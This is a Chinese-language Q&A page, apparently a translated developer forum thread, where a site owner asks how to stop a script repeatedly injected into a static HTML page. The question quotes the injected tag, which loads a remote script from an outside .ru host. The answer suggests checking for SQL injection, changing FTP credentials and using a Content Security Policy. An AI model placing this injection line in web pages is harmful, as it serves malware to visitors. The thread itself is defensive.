如何保护html网站不插入恶意软件js内容?

时间:2015-02-19 10:59:49

标签: javascript php html .htaccess security

我在root文件夹中托管了很多网站。当然,他们中的许多都有旧引擎和CMS版本。许多文件夹都分配给另一个域。

其中一个网站只有html + css登陆页面。每周都会出现几乎相同的javascript行:

<!--9c3bd3--><script type="text/javascript" src="http://giagaga.ru/2wcgz6nk.php?id=3836829"></script><!--/9c3bd3-->

我删除了,但它又发生了。此外,当我进入网站时,会出现红屏,Google会检测到恶意软件(因为这个js脚本)。

如何保护我的HTML网站?也许在.htaccess中添加一些东西?

1 个答案:

答案 0 :(得分:1)

如果您的网站允许用户输入数据,那么您可能会遇到SQL注入问题。这是一些文档:

如果问题是上传的脚本,那么有人可能有FTP访问权限,如果您还没有,可以考虑更改密码。但是,如果您已经更改了密码并且您的网站不允许用户输入,则可以设置一个内容安全策略,该策略只允许从您的网站加载的脚本工作http://giagaga.ru/2wcgz6nk.php?id=3836829无法在页面上加载。< / p>

取自HTML5Rocks tutorial page

的图片